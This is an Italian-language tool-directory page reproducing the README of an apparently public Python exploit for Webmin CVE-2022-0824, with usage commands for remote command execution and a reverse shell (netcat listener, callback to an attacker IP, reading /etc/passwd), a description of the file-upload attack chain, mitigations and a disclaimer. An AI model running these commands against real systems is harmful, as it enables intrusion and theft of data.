Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/nudttan91/webmin-cve-2022-0824-enhanced-exploit
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlRed TeamingStrumento di Accesso RemotoGenerazione di Shellcode
GitHubnudttan91/webmin-cve-2022-0824-enhanced-exploit

Webmin-CVE-2022-0824-Enhanced-Exploit

Python exploit per Webmin CVE-2022-0824 con supporto dual-mode: esecuzione diretta di comandi e reverse shell. Include molteplici tipi di payload, gestione intelligente dei file e logging di debug dettagliato per test di sicurezza autorizzati.

Vedi Repository
81 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Webmin-CVE-2022-0824-Enhanced-Exploit

[!IMPORTANT]

Strumento di sfruttamento avanzato per Webmin CVE-2022-0824 - Supporta doppia modalità: esecuzione di comandi e reverse shell

Python Version License CVE

[!IMPORTANT]

Uno strumento di sfruttamento avanzato per la vulnerabilità Webmin CVE-2022-0824, supporta due modalità: esecuzione diretta di comandi e reverse shell.

🚀 Caratteristiche

  • ✅ Supporto doppia modalità: Modalità esecuzione comandi + Modalità reverse shell
  • ✅ Molteplici Payload: Payload Perl, Bash e Python
  • ✅ Gestione intelligente dei file: Genera automaticamente nomi file univoci per evitare conflitti
  • ✅ Caricamento con sovrascrittura forzata: Gestione automatica della sovrascrittura di file esistenti
  • ✅ Molteplici metodi di caricamento: Download HTTP, caricamento diretto, creazione tramite comandi
  • ✅ Informazioni dettagliate di debug: Log completi del processo di esecuzione
  • ✅ : Output colorati e chiare indicazioni di stato
Interfaccia user-friendly

📋 Informazioni sulla vulnerabilità

  • ID CVE: CVE-2022-0824
  • Versioni affette: Webmin < 1.990
  • Tipo di vulnerabilità: Esecuzione remota di codice tramite caricamento arbitrario di file
  • Punteggio CVSS: 9.8 (Critico)

🛠️ Requisiti di installazione

root@kitploit:~
# Python 3.6+
pip3 install requests urllib3

📖 Istruzioni per l'uso

Modalità esecuzione comandi (consigliata)

root@kitploit:~
# Esecuzione comando base
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "whoami"

# Visualizza informazioni di sistema
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "uname -a"

# Elenca file
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "ls -la /etc"

# Visualizza file sensibili
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "cat /etc/passwd"

# Informazioni di rete
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "netstat -tulnp"

Modalità reverse shell

root@kitploit:~
# 1. Avvia il listener
nc -nlvp 9999

# 2. Esegui l'exploit
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 -L attacker_ip -P 9999

📝 Descrizione dei parametri

ParametroDescrizioneObbligatorioEsempio
-t, --targetURL di destinazione Webmin✅http://192.168.1.100:10000/
-c, --credentialCredenziali di accesso✅admin:password
-LS, --py3http_serverIndirizzo del server HTTP✅192.168.1.50:8080
--shellComando da eseguire❌"ls -la"
-L, --callback_ipIP di callback reverse shell❌*192.168.1.50
-P, --callback_portPorta di callback reverse shell❌*9999

*Nota: richiesta in modalità reverse shell

🎯 Esempi di utilizzo

Esempio 1: Raccolta informazioni di sistema

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "whoami && id && pwd"

Esempio 2: Esplorazione del filesystem

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "find /home -name '*.txt' 2>/dev/null"

Esempio 3: Visualizzazione configurazione di rete

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "ip addr show && route -n"

🔧 Principio di funzionamento

  1. Autenticazione login: Accedi all'interfaccia di amministrazione Webmin utilizzando le credenziali fornite
  2. Generazione del payload: Genera uno script CGI appropriato in base alla modalità
  3. Caricamento del file: Carica il payload tramite la funzione di download HTTP del file manager
  4. Impostazione permessi: Imposta i permessi di esecuzione per il file caricato
  5. Esecuzione comandi: Accedi allo script CGI caricato per eseguire comandi o stabilire una connessione inversa

🛡️ Raccomandazioni per la protezione

  • Aggiornare Webmin all'ultima versione (>= 1.990)
  • Limitare l'accesso di rete all'interfaccia di amministrazione di Webmin
  • Utilizzare password forti e autenticazione a due fattori
  • Eseguire audit periodici dei log di sistema
  • Distribuire un Web Application Firewall (WAF)

⚠️ Dichiarazione di non responsabilità

Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e a scopi educativi.

  • 🚫 Vietato l'uso su sistemi non autorizzati
  • 🚫 Vietato l'uso per attacchi malevoli
  • 🚫 L'utente si assume la responsabilità legale
  • ✅ Utilizzare solo in ambienti con autorizzazione esplicita
  • ✅ Utilizzare per ricerche sulla sicurezza e verifica di vulnerabilità

📚 Dettagli tecnici

Tipi di payload

  • Perl CGI: Payload principale, migliore compatibilità
  • Bash CGI: Payload di riserva, adatto per sistemi Linux
  • Python CGI: Payload di riserva, più ricco di funzionalità

Metodi di caricamento

  1. Download HTTP: Tramite la funzione di download remoto del file manager Webmin
  2. Caricamento diretto: Tramite interfaccia di upload file
  3. Creazione tramite comando: Creazione file tramite comandi di sistema

Strategia di denominazione dei file

  • Hash MD5 basato sul contenuto del comando
  • Suffisso con timestamp
  • Assicurare nomi file diversi per ogni esecuzione

🔄 Registro delle modifiche

v5.0 (2025-08-05)

  • ✨ Nuova modalità esecuzione comandi
  • 🐛 Risolto problema di sovrascrittura file
  • 🔧 Migliorata strategia di denominazione file
  • 📈 Migliorata gestione degli errori

v4.0 (basato sull'originale)

  • 🎯 Basato sul codice originale di faisalfs10x
  • 🔧 Migliorata compatibilità CGI
  • 📝 Aggiunti log dettagliati

🤝 Contributi

Benvenuti segnalazioni di issue e Pull Request!

  1. Forka questo progetto
  2. Crea un branch per la funzionalità (git checkout -b feature/AmazingFeature)
  3. Committa le modifiche (git commit -m 'Add some AmazingFeature')
  4. Spingi sul branch (git push origin feature/AmazingFeature)
  5. Apri una Pull Request

📄 Licenza

Questo progetto è concesso in licenza MIT - consulta il file LICENSE per i dettagli

🙏 Riconoscimenti

  • Autore del codice originale: @faisalfs10x
  • Progetto originale: Webmin-CVE-2022-0824-revshell
  • Scopritore del CVE: ricercatori di sicurezza correlati

📞 Contatti

Per domande o suggerimenti, contattaci tramite:

  • 📧 Apri una Issue su GitHub
  • 🐛 Segnala problemi di sicurezza tramite messaggio privato

⭐ Se questo progetto ti è utile, dai una stella per supportarlo!

🔗 Link correlati

  • Dettagli CVE-2022-0824
  • Sito ufficiale Webmin
  • Progetto originale

requirements.txt

root@kitploit:~
requests>=2.25.1
urllib3>=1.26.0
Scarica lo strumento